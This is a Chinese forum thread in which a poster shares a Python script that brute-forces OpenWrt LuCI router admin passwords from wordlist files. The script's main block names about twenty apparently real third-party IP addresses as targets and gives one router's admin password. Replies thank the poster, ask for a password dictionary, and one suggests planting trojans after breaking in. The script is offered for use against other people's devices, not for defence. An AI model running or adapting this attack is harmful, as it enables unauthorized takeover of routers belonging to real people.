吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 5861|回复: 47
上一主题 下一主题
收起左侧

[Python 原创] openwrt 后台密码爆破

[复制链接]
跳转到指定楼层
楼主
lichen218 发表于 2023-6-23 17:35 回帖奖励

[Python] 纯文本查看 复制代码
#! / usr / bin / python
# -- coding: utf-8 --**

import requests
import aiohttp
import asyncio
import sys,os
import time
import json
import logging
import atexit
# 配置logging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
sadgfg = {
    "issuccess": False,
    "passflie": {
        "fliepath": "",  # 字典名称
        "line": 0  # 当前文件破解到了多少行
    },
    "datasucc": {
        "user": None,  # 当前破解的用户名称
        "password": None,  # 破解成功的密码
    }
}

logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s %(levelname)s %(message)s',
                    datefmt='%a, %d %b %Y %H:%M:%S',
                    handlers=[logging.FileHandler('openwrtlogin.log', 'w', 'utf-8')])

from termcolor import colored, cprint
def GetJsonini():
    with open("example.ini", "a+",encoding="utf-8") as f:
        f.seek(0,0)
        if f.readlines():
            f.seek(0, 0)
            return json.loads(f.readlines()[0])
        else:
            j = {
                'data' : {}
            }

            return j

def savejson(j):

    with open("example.ini","w",encoding="utf-8")as f:
        f.seek(0,0)
        f.write(json.dumps(j))
jsonss = GetJsonini()
def exit_handler():
    savejson(jsonss)
    logging.shutdown()

atexit.register(exit_handler)



url = None
data = {
            "luci_username": "root",
            "luci_password": "123456",
            # "Submit": "登 陆",
        }
currenttime = time.time()
async def getpage(mobile,sem):
    async with sem:
        headers = {
            # "uuid": "6B9CBB8F-E87E-4C14-969C-96E03E30",
            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
           "Referer": "http://183.158.77.77:8081/cgi-bin/luci/",
            "Content-Type": "application/x-www-form-urlencoded",
            "Upgrade-Insecure-Requests":'1',
            "User-Agent": "Mozilla/5.0 (Linux; Android 12; Mi 10 Build/SKQ1.220303.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.141 Mobile Safari/537.36 XWEB/5049 MMWEBSDK/20230405 MMWEBID/8973 MicroMessenger/8.0.35.2360(0x28002353) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android"
        }
        data['luci_password'] = mobile
        try:
            async with  aiohttp.request("POST",url,data=data,headers=headers) as response:
                if(len(response.history) > 0):
                    with open("ua.txt","a+")as f:
                        f.write(mobile)
                        print("mima",mobile,"当前耗时",time.time()-currenttime)
                        sys.exit(cprint('[-] Canceled by user', 'red'))
        except Exception as e:
            print(e)
            sys.exit(cprint('[-] Canceled by user', 'red'))
            # if (re.findall("'login.html\?flag=(.*?)'",res)[0]!="0"):
            #     print(mobile[0])
sem = asyncio.Semaphore(20)
loop = asyncio.get_event_loop()
numcount = 0
def ss(passworlds,sunmmm):
    """
    passworlds 密码数组
    sunmmm 每组多少个
    """
    for i in range(0, max(int(len(passworlds) / sunmmm), 1) + 1):
        a = passworlds[i * sunmmm:(i + 1) * sunmmm]
        if len(passworlds) - (i * sunmmm) < sunmmm:
            a = passworlds[(i - 1) * sunmmm:]
        tasks = []
        for i in a:
            c = getpage(i, sem)
            task = asyncio.ensure_future(c)
            tasks.append(task)
        loop.run_until_complete(asyncio.wait(tasks))
def main(path,sleep:int,每组多少个:int):
    files1 = []
    global jsonss
    global numcount
    if not os.path.isfile(path):
        for root, dirs, files in os.walk(path):
            for file in files:
                path = os.path.join(root, file)
                if os.path.isfile(path) and path.split(".")[-1:][0].lower() == "txt":
                    files1.append(path)
    elif path.split(".")[-1:][0].lower() == "txt":
        files1.append(path)
    else:
        sys.exit(cprint('[-] 请输入路径或者文件', 'red'))
    if not files1:
        sys.exit(cprint('[-] 目录或路径不对', 'red'))
    if not jsonss['data'].get(url,None):
        jsonss['data'][url] = sadgfg
        jsonss['data'].get(url, None)["passflie"]["fliepath"] = files1[0]
    else:
        if not jsonss['data'].get(url, None)['issuccess']:
            path = jsonss['data'].get(url, None)["passflie"]["fliepath"]
            del files1[:files1.index(path)]
            numcount = jsonss['data'].get(url, None)["passflie"]["line"]
        else:
            sys.exit(cprint('已破解成功', 'red'))


    for i in files1:
        passworlds = []

        for line in open(i,"rb"):
            try:
                if(line.strip().decode()!=""):
                     passworlds.append(line.strip().decode())
            except:
                pass
                # 密码为其它字符暂无法解析 如中文
        print("字典密码总数量%s 密码文件:%s"%(len(passworlds),i) )
        del passworlds[:max(numcount,1)-1]
        numcount -= 1
        temppasswrls = []

        for i in range(0,len(passworlds),每组多少个):

            if(len(passworlds)-i<每组多少个):
                temppasswrls.append(passworlds[i:len(passworlds)-1])
            else:
                temppasswrls.append(passworlds[i:i+每组多少个])
        for i in temppasswrls:
            for j in i:
                test(j)
            print("已等待%s秒"%(sleep))
            time.sleep(sleep)
def test(mobile):
    data['luci_password'] = mobile
    global numcount
    numcount += 1
    try:
        rsponse = requests.post(url,data=data,allow_redirects=False,timeout=15,verify=False)
        if(rsponse.status_code!=403):

            jsonss['data'].get(url, None)["datasucc"]["password"] = str(mobile)
            jsonss['data'].get(url, None)["issuccess"] = True
            sys.exit(cprint('[-] 破解成功', 'red'))
        else:
            jsonss['data'].get(url, None)["passflie"]["line"] = numcount
            logging.info('当前处理%s'%(numcount))
    except Exception as e:
        for i in (e.args):
            print(i)
        "Read timed out"
        print("当前处理",numcount)
        sys.exit(cprint('[-] Canceled by user', 'red'))
if __name__=="__main__":
    path = "G:\\wpa2pojiezidian\\"  # 可以是路径或者文件
    每组间隔多久 = 14  # 秒
    每组多少个 = 800
    # 有4万多这样的后台网站
    url = "http://222.79.58.51:10001/cgi-bin/luci/"
    url = "https://47.87.132.70/"
    url = "http://50.46.15.209/"
    url = "https://207.181.230.249/"
    url = "http://72.80.138.192/cgi-bin/luci/"
    url = "http://45.140.88.188:8088/cgi-bin/luci/"
    url = "http://60.208.219.68:8088/cgi-bin/luci/"
    url = "https://gusomaru.eu.org:8443/cgi-bin/luci/"
    url = "http://24.55.7.92/"
    url = "http://113.224.62.179:9003/cgi-bin/luci/"
    url = "http://113.224.62.179:8332/cgi-bin/luci/"
    url = "http://118.113.66.171:1080/cgi-bin/luci/"
    url = "http://182.148.152.191:8091/cgi-bin/luci/"
    url = "http://119.127.43.78:3000/cgi-bin/luci/"
    url = "http://45.33.60.215/cgi-bin/luci/"
    url = "http://123.234.164.108:18080/"
    url = "https://47.87.132.70/"
    url = "http://67.188.234.70:8088/cgi-bin/luci/"
    url = "https://96.45.163.18:2096/cgi-bin/luci/"
    # "http://183.158.77.77:8081/cgi-bin/luci/"  密码password
    main(path,每组间隔多久,每组多少个)

微信图片_20230623173310.png (191.57 KB, 下载次数: 8)

微信图片_20230623173310.png

免费评分

参与人数 5吾爱币 +4 热心值 +5 收起 理由
NAVYSUCK + 1 谢谢@Thanks!
junjia215 + 1 + 1 谢谢@Thanks!
FchiyuT + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
老衲 + 1 + 1 谢谢@Thanks!
ckloder + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
逃亡的蛋挞 发表于 2023-6-23 21:35
A* B=C
设B为密码,C为包。A为加密方式。
为什么要穷举B,不用C。
是不是只要知道每个软件的加密方式,就可以直接得出密码?
推荐
 楼主| lichen218 发表于 2023-6-23 17:59 |楼主
simmtech 发表于 2023-6-23 17:48
太复杂    了,还是要支持        。

下次研究一下群晖的后台密码爆破
推荐
simmtech 发表于 2023-6-23 17:48
5#
hys952 发表于 2023-6-23 21:37
谢谢分享!
6#
老衲 发表于 2023-6-23 21:58
求一个字典下载,谢谢
7#
(166699) 发表于 2023-6-23 21:59
这个不错呀... 爆破进去,直接木马 积少成多!真厉害呀!
8#
redfieldw 发表于 2023-6-23 22:12
这样都行,那好吧
9#
老衲 发表于 2023-6-23 22:23
File "E:\CodeDocker\openwrt 后台密码爆破.py", line 33, in <module>
    from termcolor import colored, cprint
ModuleNotFoundError: No module named 'termcolor'
10#
 楼主| lichen218 发表于 2023-6-23 22:38 |楼主
老衲 发表于 2023-6-23 22:23
File "E:\CodeDocker\openwrt 后台密码爆破.py", line 33, in
    from termcolor import colored, cpri ...

安装一下这个模块就好了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 13:16

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表